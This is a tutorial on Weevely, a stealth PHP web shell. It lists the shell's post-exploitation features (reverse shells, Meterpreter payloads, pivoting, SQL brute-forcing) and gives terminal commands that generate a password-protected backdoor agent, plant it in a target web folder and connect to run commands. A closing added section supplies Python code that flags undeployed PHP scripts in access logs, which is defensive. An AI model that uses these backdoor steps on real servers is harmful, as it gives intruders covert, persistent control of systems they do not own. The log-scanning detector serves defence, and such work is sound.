Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at run time.
Uploading the Weevely PHP agent to a target web server gives remote shell access to it through a small-footprint script. Weevely has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.
Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones. It is a command-line web shell, dynamically extended over the network at runtime, designed for remote server administration and penetration testing.
- Shell access to the target
- SQL console pivoting on the target
- HTTP/HTTPS proxy to browse through the target
- Upload and download files
- Spawn reverse and direct TCP shells
- Audit remote target security
- Run Meterpreter payloads
- Port scan pivoting on target
- Mount the remote filesystem
- Bruteforce SQL accounts pivoting on the target
Download the Git file:
Download via your browser:
Download via wget (in your terminal):
Generate the backdoor agent
The Weevely client communicates with the PHP agent installed on the target. Move to the weevely3/ folder and run ./weevely.py to print the help, or simply type weevely in your terminal.
root@blackhattutorial:~# weevely
[+] weevely 3.2.0
[!] Error: too few arguments
[+] Run terminal to the target
    weevely <URL> <password> [cmd]
[+] Load session file
    weevely session <path> [cmd]
[+] Generate backdoor agent
    weevely generate <password> <path>
To generate a new agent, use the generate option, passing the password and path arguments.
root@blackhattutorial:~# weevely generate 123 /root/Desktop/backdoor.php
Generated backdoor with password '123' in '/root/Desktop/backdoor.php' of 1476 byte size.
Then, upload the generated agent under the target web folder. Make sure that the agent PHP script is properly exposed and executable through the web server.
Connect to the agent
Launch the weevely script to connect to the remote agent.
root@blackhattutorial:~# weevely http://localhost/backdoor.php 123
weevely>
At the first weevely> prompt the session is not yet connected, so that users can set any useful pre-connection options, e.g. the proxies to be used. Running a real command automatically starts the session on the remote target.
weevely> uname -a
Linux kali 5.6.0-kali2-amd64 #1 SMP Debian 5.6.14-2kali1 (2020-06-10) x86_64 GNU/Linux
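Seen from the defender's side, the upload and connect steps above mean that a PHP script which was never deployed starts answering requests. The following added example (not part of the original tutorial or of Weevely) scans access logs for such scripts; the Combined Log Format, the deployment manifest and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Matches /x.php and PATH_INFO forms such as /x.php/extra
PHP_RE = re.compile(r'^(?P<script>.*?\.php)(?:/.*)?$', re.IGNORECASE)

def find_undeployed_php(log_lines, deployed):
    """Return {script: {"clients": set, "hits": int}} for PHP scripts that
    answered 2xx but are missing from the deployment manifest."""
    findings = defaultdict(lambda: {"clients": set(), "hits": 0})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or not m["status"].startswith("2"):
            continue  # malformed line, or the script was not served
        path = unquote(m["target"].split("?", 1)[0])  # drop query, decode %xx
        php = PHP_RE.match(path)
        if not php or php["script"] in deployed:
            continue  # not a PHP script, or a script we shipped ourselves
        entry = findings[php["script"]]
        entry["clients"].add(m["ip"])
        entry["hits"] += 1
    return dict(findings)

def _line(ip, method, target, status):
    # Helper that builds one constructed Combined Log Format line.
    return (f'{ip} - - [10/Jun/2020:12:00:00 +0000] '
            f'"{method} {target} HTTP/1.1" {status} 512 "-" "-"')

# Constructed sample data: documentation IP ranges, hypothetical manifest.
DEPLOYED = {"/index.php", "/contact.php"}
SAMPLE_LOG = [
    _line("198.51.100.4", "GET", "/index.php?p=1", 200),
    _line("198.51.100.9", "GET", "/contact.php", 200),
    _line("198.51.100.9", "GET", "/wp-login.php", 404),    # probe, not served
    _line("198.51.100.4", "GET", "/static/logo.png", 200),
] + [_line("203.0.113.7", "POST", "/backdoor.php", 200)] * 3

if __name__ == "__main__":
    for script, info in find_undeployed_php(SAMPLE_LOG, DEPLOYED).items():
        print(script, info["hits"], sorted(info["clients"]))
```

A script that returns 2xx, is absent from the manifest and is requested by a single client is a strong candidate for review; keep the manifest generated from the deployment pipeline rather than from the live web root.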